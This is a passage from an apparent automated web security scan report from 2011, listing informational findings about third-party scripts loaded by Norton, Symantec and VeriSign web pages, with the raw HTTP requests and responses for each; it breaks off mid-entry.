HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:45 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 81813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... <![endif]--><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js"> </script>...[SNIP]...
15.3. http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://community.norton.com
Path:
/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n http://www.symantec.com/script/omniture/om_code.js http://www.symantec.com/script/omniture/s_code.js
Request
GET /t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline HTTP/1.1 Host: community.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:46 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 339433 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... <![endif]--><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js"> </script>...[SNIP]...
15.4. http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://community.norton.com
Path:
/t5/Norton-Protection-Blog/bg-p/npb1
Issue detail
The response dynamically includes the following scripts from other domains:http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=4wNTh0OokmJIZVk29a3GDSLrYrBTfMFc&height=370&playerContainerId=lia-vid-4wNTh0OokmJIZVk29a3GDSLrYrBTfMFcw640h370r865&width=640&wmode=opaque http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7&height=370&playerContainerId=lia-vid-5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7w640h370r944&width=640&wmode=opaque http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFs&height=370&playerContainerId=lia-vid-RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFsw640h370r895&width=640&wmode=opaque http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6n&height=360&playerContainerId=lia-vid-VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6nw640h360r928&width=640&wmode=opaque http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=o4d2ZxOjymhjnOVjrWcXiS1riXUG85aO&height=338&playerContainerId=lia-vid-o4d2ZxOjymhjnOVjrWcXiS1riXUG85aOw600h338r689&width=600&wmode=opaque http://connect.facebook.net/en_US/all.js http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n http://www.symantec.com/script/omniture/om_code.js http://www.symantec.com/script/omniture/s_code.js
Request
GET /t5/Norton-Protection-Blog/bg-p/npb1 HTTP/1.1 Host: community.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:48 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 422706 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... <![endif]--><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=4wNTh0OokmJIZVk29a3GDSLrYrBTfMFc&height=370&playerContainerId=lia-vid-4wNTh0OokmJIZVk29a3GDSLrYrBTfMFcw640h370r865&width=640&wmode=opaque"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=o4d2ZxOjymhjnOVjrWcXiS1riXUG85aO&height=338&playerContainerId=lia-vid-o4d2ZxOjymhjnOVjrWcXiS1riXUG85aOw600h338r689&width=600&wmode=opaque"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7&height=370&playerContainerId=lia-vid-5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7w640h370r944&width=640&wmode=opaque"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFs&height=370&playerContainerId=lia-vid-RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFsw640h370r895&width=640&wmode=opaque"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6n&height=360&playerContainerId=lia-vid-VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6nw640h360r928&width=640&wmode=opaque"> </script>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js"> </script>...[SNIP]...
15.5. http://de.community.norton.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://de.community.norton.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://nortonde.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js http://nortonde.i.lithium.com/t5/scripts/1D71204D9D9658792FA0096B2FB2A913/lia-scripts-common-min.js http://nortonde.i.lithium.com/t5/scripts/FE6BBBDB381DA2F6F1B96A6E926BAF19/lia-scripts-body-min.js http://www.symantec.com/lib/jsp/headerjs.jsp?lg=de&ct=de&sg=norton&url=/norton/familyresources/index.jsp&domain=www.symantec.com&analytics=n http://www.symantec.com/script/omniture/om_code.js http://www.symantec.com/script/omniture/s_code.js
Request
GET / HTTP/1.1 Host: de.community.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:46 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 59970 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... <meta name="om.user_id" content="" /><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=de&ct=de&sg=norton&url=/norton/familyresources/index.jsp&domain=www.symantec.com&analytics=n"> </"></script> <link rel="shortcut icon" href="http://www.symantec.com/favicon.ico" type="image/x-icon" /><script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... <!-- END SITECATALYST CODE VERSION: H.15.1. --> <script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/1D71204D9D9658792FA0096B2FB2A913/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/FE6BBBDB381DA2F6F1B96A6E926BAF19/lia-scripts-body-min.js"> </script>...[SNIP]...
15.6. http://free.pctools.com/free-antivirus/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://free.pctools.com
Path:
/free-antivirus/
Issue detail
The response dynamically includes the following scripts from other domains:http://twitter.com/javascripts/blogger.js http://twitter.com/statuses/user_timeline/pctools.json?callback=twitterCallback2&count=1
Request
GET /free-antivirus/ HTTP/1.1 Host: free.pctools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.3.4 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Fri, 09 Sep 2011 21:42:00 GMT Date: Fri, 09 Sep 2011 21:42:00 GMT Content-Length: 17565 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Free AntiVirus & An...[SNIP]... </div> <script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"> <!--mce:0--></script> <script src="http://twitter.com/statuses/user_timeline/pctools.json?callback=twitterCallback2&count=1" type="text/javascript"> <!--mce:1-->...[SNIP]...
15.7. http://investor.symantec.com/phoenix.zhtml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://investor.symantec.com
Path:
/phoenix.zhtml
Issue detail
The response dynamically includes the following scripts from other domains:http://admin.brightcove.com/js/BrightcoveExperiences.js http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2 http://widgets.twimg.com/j/2/widget.js
Request
GET /phoenix.zhtml?c=89422&p=irol-irhomeNews HTTP/1.1 Host: investor.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=58 Date: Fri, 09 Sep 2011 21:42:06 GMT Content-Length: 39751 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjA2IFBNPC90aW1lU3RhbXA+PHRpbWVUaWxsQ0NCTlJlZnJlc2g+NjA8L3RpbWVUaWxsQ0NCTlJlZnJl...[SNIP]... <link rel="stylesheet" type="text/css" href="client/89/89422/css/ccbnIR.css" /><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"> </script>...[SNIP]... </div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"> </script>...[SNIP]...
15.8. https://knowledge.verisign.ch/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
The response dynamically includes the following script from another domain:https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.9. https://knowledge.verisign.ch/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Issue detail
The response dynamically includes the following script from another domain:https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.10. https://knowledge.verisign.ch/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Issue detail
The response dynamically includes the following script from another domain:https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Issue detail
The response dynamically includes the following script from another domain:https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The response dynamically includes the following script from another domain:https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The response dynamically includes the following script from another domain:https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.14. http://query.verisign.ch/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The response dynamically includes the following scripts from other domains:http://cdn.verisign.com/assets/shared/js/curvycorners.js http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js https://seal.verisign.com/getseal?host_name=query.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... </script> <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=query.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </div> <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/shared.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="//cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]...
15.15. https://securitycenter.verisign.com/celp/enroll/outsideSearch
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/outsideSearch
Issue detail
The response dynamically includes the following script from another domain:https://ssl.google-analytics.com/urchin.js
Request
GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/ Connection: close <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <title> Search for SSL or Code Signing Certificates from VeriSig...[SNIP]... <body aLink=#000000 bgColor=#ffffff class=bgWht leftMargin=0 link=#000000 topMargin=0 vLink=#000000 marginheight="0" marginwidth="0" onLoad="focus()"><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]...
15.16. https://ssl-certificate-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The response dynamically includes the following scripts from other domains:https://ssl.google-analytics.com/urchin.js https://www.verisign.com/js/mbox.js
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"> </script>...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.17. https://ssl-certificate-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The response dynamically includes the following script from another domain:https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: Apache Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.18. http://store.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.symantec.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js
Request
GET /?inid=us_pagenotfound_smb_store HTTP/1.1 Host: store.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:30:57 GMT Content-Length: 18197 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <!-- ...[SNIP]... <!-- Microsoft CDN Script References --> <script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js" type="text/javascript"> </script> <script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js" type="text/javascript"> </script>...[SNIP]... <!-- Microsoft CDN Script References --> <script src="http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js" type="text/javascript"> </script>...[SNIP]...
15.19. https://symantec-corporation.com/servlet/campaignrespondent
previous
next
Summary
Severity:
